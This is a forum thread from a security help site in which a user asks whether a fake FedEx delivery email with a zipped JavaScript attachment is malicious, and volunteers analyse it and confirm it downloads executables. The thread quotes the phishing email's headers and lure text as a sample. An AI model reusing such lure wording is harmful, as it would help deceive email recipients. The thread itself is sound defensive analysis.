Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

is this a malware email?


  • Please log in to reply
26 replies to this topic

#1 somae

somae

  • Members
  • 87 posts
  • OFFLINE
  •  
  • Local time:03:40 PM

Posted 24 March 2015 - 02:52 AM

We got this email recently. It says it's from fedex. As we've been getting fairly frequent fedex deliveries I'm not completely sure if it could be something we're expecting - but I'm pretty sure it's not. It has an attached file that the main email says shows the shipment label. The attachment is a zip file and the file it contains is a "doc.jx" file. I'm pretty sure this is a virus so I haven't opened it. I scanned the zip file with bitdefender and it didn't find anything but, for some reason, there was no option to scan the doc.jx file it contained. (Java script?)
 
I'm also pretty sure that fedex doesn't do things like that. I'm wondering how to be sure it's a virus and who can I report it to? I was thinking of reporting it to spamcop, but since this probably contains malware, I was thinking it isn't exactly "spam".
 
Thanks.
 
These are the email headers:
 
X-Apparently-To: ; Mon, 23 Mar 2015 17:12:08 +0000
Return-Path: <noreply@secureserver.net>
X-YahooFilteredBulk: 72.167.234.245
Received-SPF: pass (domain of secureserver.net designates 72.167.234.245 as permitted sender)
X-YMailISG: vu4yYcEWLDtQOVCwzbNUwHp34AqMfV38KKZOPWo0CEA1GVMi
 O55f37BaQumB5zhfmuZY25Nre5Y9sb.iHOEiYga4vCouDcCpNtdHonZAB1fd
 7uiHeEJjqWhz71_kmGx5rKhh1R0FmucN92zHQBB5jcSB7Z_aatVII_EYuaFS
 Wt6P_d75hwjPRyfSmvfJr_s7c.jZb6KzlikFrWgcLVnzduXeJmm_QPJSSzJ6
 CN4EIGbiQYF_3P7hK.HKdoLHu8O8bXCXWlV1rh_5IUN9Arkapbx0yBGl7L4O
 YC_gfFpMzuWpLrWQ1NftTo8XS5S3nbzmd8RjtZyXcjHtpZTem61Lrun1IIax
 vKbk0C5OmyrZHDSq6g0D7SvBoYQXhUv3F2k7aZn1PaStfkMMbBEFvBpfg9uZ
 yAKcv7gFJ9h4jhCNN20xLx.Z2dtvDyTpVqwcexkijngExc878GnvNCiZzA.R
 8UWoJZZGJwIxUVGD1XIN02YjpkmiTMuTU8y_dDR52Gd.Eu6R85AAdJqASLhz
 sJ2J7yY1G8jxkpqCDIk7z1w9sk3hd51dpBcW7Cg7gNxVNGSsOb4EIeEA3oBJ
 4SzUM4E6asSfsadKdKSxfjw7DO5Ci4qJDVa_UfoJxwt_v66zV9e89EyvPp2A
 .jSoYcKo.Miq2k8qt0VTCu_WaSFjsoUMJGKCxVMkXKNWV4t7QGp84PkqPpuK
 Rl3RJMyLb5ZbtwDnyCxTSlTMDxxlwM0lhTl9F.c88Qhu39ctLhB3ttSAQoJF
 6510aPZXilwwVnLC1aIgpLjgyysm2KRwg6HE_aERycqU65gdONgqoEiHw9EU
 PCHWI09GCSfWNOFE4uNOVCfEIuONbyq1lk33BL8fP7t__7eatRdALFze2T0b
 b5C_s15PVF4LSzRk0om8cnZuxfHNT_t_zLhSP0BsdpjjXgzQehUzzitn8ZPw
 yhDChY4WhWp_VQkJt5YEv6qoVZnXdHWbWRGMiVSKQnrXR_4bO4W7A0APGX0W
 6xa9dhPgeOtil9WZ4xaaRGYArYjYWhfZb29Kg5Kny_oCEqQ4CiUr7xPXbhmw
 jdWgFBBVTjo_r1AJUfZynRPT0vRdWSRsps4Go7TYQFHb79socvaSz623IRai
 gB3ZU.0Lq_6Dd4tNjkuHIDWIwQweY0HYzJxI.6zZ.2WAm5rBRn90afeAnZwv
 b6ieQ0w7uIWjZltkQ0zVrY_xRRZRxedlROXljd905YZMeTVeSu1jkZDzK_Vj
 aV5I21sItvcyYXTPydhl9bfTHBjSJxiihGDcJmrqfzcJvROS1KyPjZ8WPC.B
 tCL2f5iE8l6ifzolaJ1ydBUVdFah5NryGOihP1yrau3YYXdR2UqjCuJTPObu
 _MclJ_2EXEM.WMIhYtosKneQA68VD2LGgU4VAJbEhq8gZp_x45zcrmCEzlY2
 Sk.5AAqqyZR6g3DlVGa_8_3yvSojY8_XCiCR
X-Originating-IP: [72.167.234.245]
Authentication-Results: mta1234.mail.ne1.yahoo.com  from=ip-198-71-175-30.ip.secureserver.net; domainkeys=neutral (no sig);  from=ip-198-71-175-30.ip.secureserver.net; dkim=neutral (no sig)
Received: from 127.0.0.1  (EHLO p3nlsmtp20.shr.prod.phx3.secureserver.net) (72.167.234.245)
  by mta1234.mail.ne1.yahoo.com with SMTP; Mon, 23 Mar 2015 17:12:07 +0000
Received: from P3NW8SHG326.phx3.gdhosting.gdg ([184.168.27.33])
    by p3nlsmtp20.shr.prod.phx3.secureserver.net with
    id 754R1q00Z0irafs0154R6W; Mon, 23 Mar 2015 10:04:32 -0700
Subject: Problem with parcel shipping, ID:0000543656
To:
X-PHP-Originating-Id: [6585553]
Date: Mon, 23 Mar 2015 10:11:53 -0700
From: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>
Reply-To: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>
Message-ID: <8727222c4091f1005288b900f442ff76@ip-198-71-175-30.ip.secureserver.net>
X-Priority: 3
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="b1_c84fd0c0d34f0c6530843ba1f95f47bf"
Content-Transfer-Encoding: 8bit
Content-Length: 5781

--b1_c84fd0c0d34f0c6530843ba1f95f47bf
Content-Type: text/plain; charset=us-ascii

Dear

Your parcel has arrived at March 19. Courier was unable to deliver the parcel to you.
Shipment Label is attached to email.

Sincerely,
Virgil Lowe,
Delivery Manager.


--b1_c84fd0c0d34f0c6530843ba1f95f47bf
Content-Type: application/zip; name="0000543656.zip"
Content-Transfer-Encoding: base64

Edited by quietman7, 24 March 2015 - 03:53 PM.


BC AdBot (Login to Remove)

 


#2 PuReinSAniTY

PuReinSAniTY

  • Members
  • 432 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:in a basement
  • Local time:06:10 AM

Posted 24 March 2015 - 04:00 AM

Not sure really. Maybe try doing a few searches on Google and see if it comes up with anything. If you cant find anything it is you're choice to open or delete it. If it contains malware I am sure the staff here will definitely help with you're malware problems. 


they call me te java mayster


#3 Havachat

Havachat

  • Members
  • 1,039 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Sleepy Hollow - Geelong - Go Cats.
  • Local time:06:40 AM

Posted 24 March 2015 - 04:16 AM

Did you have an Invoice No ? does it match the email ?

if not - delete it. why take the chance.

Get on the Phone - Call them - and confirm it that way.



#4 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,117 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:04:40 PM

Posted 24 March 2015 - 05:25 AM

Crypto malware and other forms of ransomware is typically spread and delivered through social engineering (trickery) and user interaction...opening a malicious email attachments (usually from an unknown or unsolicited source), opening an infected word docs with embedded macro viruses, clicking on a malicious link within an email or on a social networking site, and sometimes via exploit kits. Crypto malware can be disguised as fake PDF files in email attachments which appear to be legitimate correspondence from reputable companies such as banks and other financial institutions, or phony FedEx and UPS notices with tracking numbers. Attackers will use email addresses and subjects (purchase orders, bills, complaints, other business communications) such as this example that will entice a user to read the email and open the attachment. Another method involves tricking unwitting users into opening Order Confirmation emails by asking them to confirm an online e-commerce order, purchase or package shipment. Social engineering has become on of the most prolific tactics for distribution of malware, identity theft and fraud.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#5 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,539 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:40 PM

Posted 24 March 2015 - 09:07 AM

Hi somae :)

May I ask you to upload that .zip file on ge.tt and maybe PM me the download link (if that's allowed?) so I can take a look at it?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#6 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:04:40 PM

Posted 24 March 2015 - 09:28 AM

Definitely looks like a classic case of social engineering.  You can tell by looking at the "From" header and viewing the e-mail body; notice the terrible grammar, suggesting that the sender may be foreign.  Also, the idea that FedEx's Delivery Manager would e-mail you an invoice from a random e-mail address (not associated with FedEx), let alone that they would e-mail you at all, is highly unlikely.

 

From: "FedEx Standard Overnight" <virgil.lowe@ip-198-71-175-30.ip.secureserver.net>

 

Suspicious sender address, above.

 

Dear

Your parcel has arrived at March 19. Courier was unable to deliver the parcel to you.
Shipment Label is attached to email.

Sincerely,
Virgil Lowe,
Delivery Manager.

 

No first or last name included in the e-mail; so this is an even less in-depth phishing attempt, likely a very large-scale randomized phishing campaign with harvested e-mail addresses from all around the Internet, rather than a more targeted spear phish-type e-mail.

 

Also notice the poor grammar; and FedEx would give you a tracking number to type into their official website, not attach the shipping label to an e-mail.

 

 

 

As Aura said, could you please upload the ZIP file to a site like Mega and send me a private message with the download link?

 

Additionally, uploading the ZIP to VirusTotal will scan it through close to 60 different anti-virus engines to give you more accurate results in regard to whether it is malicious in nature.  But it seems highly likely that it is.


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#7 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,117 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:04:40 PM

Posted 24 March 2015 - 11:00 AM

May I ask you to upload that .zip file on ge.tt and maybe PM me the download link (if that's allowed?) so I can take a look at it?

We have channels here at BC to upload samples...Submit Malware Sample page
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#8 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,539 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:40 PM

Posted 24 March 2015 - 11:42 AM

But are we allowed to download these samples after or not?

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#9 White Hat Mike

White Hat Mike

  • Members
  • 312 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:::1
  • Local time:04:40 PM

Posted 24 March 2015 - 12:24 PM

 

May I ask you to upload that .zip file on ge.tt and maybe PM me the download link (if that's allowed?) so I can take a look at it?

We have channels here at BC to upload samples...Submit Malware Sample page

 

 

 

But are we allowed to download these samples after or not?

 

Don't think regular members can view / download samples, and if so, not sure of what URL to browse to to access the samples.


Information Security Engineer | Penetration Tester | Forensic Analyst

CipherTechs.com


#10 quietman7

quietman7

    Bleepin' Janitor


  • Global Moderator
  • 51,117 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Virginia, USA
  • Local time:04:40 PM

Posted 24 March 2015 - 01:08 PM

The submissions are for BC security experts and members of the MRT.
.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif

#11 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,539 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:40 PM

Posted 24 March 2015 - 01:10 PM

So yes he can also upload his sample there, so you guys can take a look at it. However that's why I asked him to upload it to ge.tt and PM me the download link so I can also take a look at it.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#12 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,659 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:40 PM

Posted 24 March 2015 - 02:29 PM

There's no need to upload the ZIP, somae has already published it in his first post: the name is 0000543656.zip and the content is base64 encoded. I'm analyzing it now.


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#13 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,539 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:04:40 PM

Posted 24 March 2015 - 02:48 PM

Well of course Didier is much better than me at analyzing malware samples so I'll leave this in his hands :P

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#14 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,659 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:40 PM

Posted 24 March 2015 - 02:49 PM

Yes, it is definitively malicious. It contains a JavaScript script that downloads 3 files from the Internet and executes them.

 

Here is the VirusTotal report for the JavaScript script:

https://www.virustotal.com/en/file/f02756650ce0af45a5e5e09b3f83e860c1483b97cc25d97525ce560153e0f400/analysis/1427225646/


Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"


#15 Didier Stevens

Didier Stevens

  • BC Advisor
  • 2,659 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:10:40 PM

Posted 24 March 2015 - 03:00 PM

Actually, it tries to download and execute 9 files.

 

When I tried to download these, only 6 downloads succeeded, resulting in 2 unique files (executables).

Here is their VirusTotal report:

https://www.virustotal.com/en/file/daf4d96a121c9e4935082d4e0264088ff352f14d868f8720d8fa7e4f99c82f05/analysis/

https://www.virustotal.com/en/file/b4075e73abb294254dc38465f956a39ceb7dcc31c263a7ee54b0e4d820184746/analysis/


Edited by Didier Stevens, 24 March 2015 - 03:20 PM.

Didier Stevens
http://blog.DidierStevens.com
http://DidierStevensLabs.com

SANS ISC Handler
Microsoft MVP 2011-2016 Consumer Security, Windows Insider MVP 2016-2018
MVP_Horizontal_BlueOnly.png

 

If you send me messages, per Bleeping Computer's Forum policy, I will not engage in a conversation, but try to answer your question in the relevant forum post. If you don't want this, don't send me messages.

 

Stevens' law: "As an online security discussion grows longer, the probability of a reference to BadUSB approaches 1.0"





0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users